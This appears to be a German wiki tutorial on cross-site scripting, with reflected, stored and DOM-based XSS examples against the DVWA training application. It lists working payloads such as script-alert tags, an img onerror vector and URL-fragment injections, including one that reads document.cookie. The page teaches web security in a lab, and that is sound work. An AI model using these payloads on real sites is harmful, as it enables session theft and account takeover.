Cross-Site-Scripting DVWA Beispiele

Aus Xinux Wiki
Version vom 6. März 2023, 13:23 Uhr von Thomas.will (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „ =Original Artikel= *https://tanmay26.medium.com/cross-site-scripting-xss-dvwa-damn-vulnerable-web-applications-36808bff37b3 =Cross-Site-Scripting (XSS)= *Te…“)
(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)
Zur Navigation springen Zur Suche springen

Original Artikel


Cross-Site-Scripting (XSS)

  • Technik, bei der Angreifer bösartige Skripte in eine Zielwebsite einschleusen
  • Es kann ihnen die Zugriffskontrolle auf die Website ermöglichen.
  • Gefahr besteht,wenn Benutzern die Eingabe von Daten Felder ohne Kontrollen ermöglicht wird.
  • Ein Angreifer kann dann auch ein Skript mit schädlichem Code einfügen.

ARTEN VON XSS

  • Reflektiertes XSS
  • Gespeichertes XSS
  • Dom-Basis XSS

Reflected XSS (Cross-Site-Scripting): RXSS

  • In diesem Fall werden keine Hackerdaten auf der Website gespeichert.
  • Der Code wird nur auf der Opferseite ausgeführt.
  • Hacker sendet ein Eingabeskript dieser Website, das dann an den Browser des Opfers reflektiert wird
  • Der Hacker lässt dann schädlichen JavaScript-Payload ausführen.

DVWA Low Level Reflected XSS

Firefox

Payload: <script>alert("xss")</script>

Xss-1.png

Chromium

Erzeugte Link

DVWA High Level Reflected XSS

Chromium

Payload: <img src=x onerror=alert("xinux")>

Xss-3.png

Firefox

Erzeugte Link

Stored XSS (Cross site scripting):SXSS

  • Gespeichertes Cross-Site-Scripting (XSS)
  • Der Hacker-Schadcode wird auf der Zielwebsite gespeichert.
  • Ein Angreifer sendet bösartiges JavaScript in die Website.
  • Dieses Skript wird auf den Computern anderer Benutzer ausgeführt.

DVWA Low Level Stored XSS

Firefox

Payload: <script>alert(document.domain)</script>

Xss-4.png

Chromium

Erzeugter Link

DOM BASE XSS

  • Der Dom Base (XSS) ist ein Kurzform-Dokumentobjektmodell-basiertes Cross-Site-Scripting.
  • Das heißt, die HTTP-Antwort der Seite selbst ändert sich nicht.
  • Ein Angreifer kann mehrere DOM-Objekte verwenden, um einen Cross-Site-Scripting-Angriff zu erstellen.
  • Die beliebtesten Objekte aus dieser Perspektive sind document.URL, document.location und document.referrer.
DVWA low level DOM XSS

Payload: https://opfer:82/vulnerabilities/xss_d/?default=<script>alert("xinux 1")</script>

Xss-7.png

DVWA Medium level DOM BASE

Payload: https://opfer:82/vulnerabilities/xss_d/?default=English#<script>alert("xinux 2")</script>

and reload your browser.

Xss-8.png


DVWA HIGH LEVEL DOM BASE

Payload: https://opfer:82/vulnerabilities/xss_d/?default=English#<script>alert(document.cookie)</script>

and reload browser.

Xss-9.png

Reference

https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS).html https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/part2/xss.html

Abgerufen von „http://wiki.ixheim.de/index.php?title=Cross-Site-Scripting_DVWA_Beispiele&oldid=42695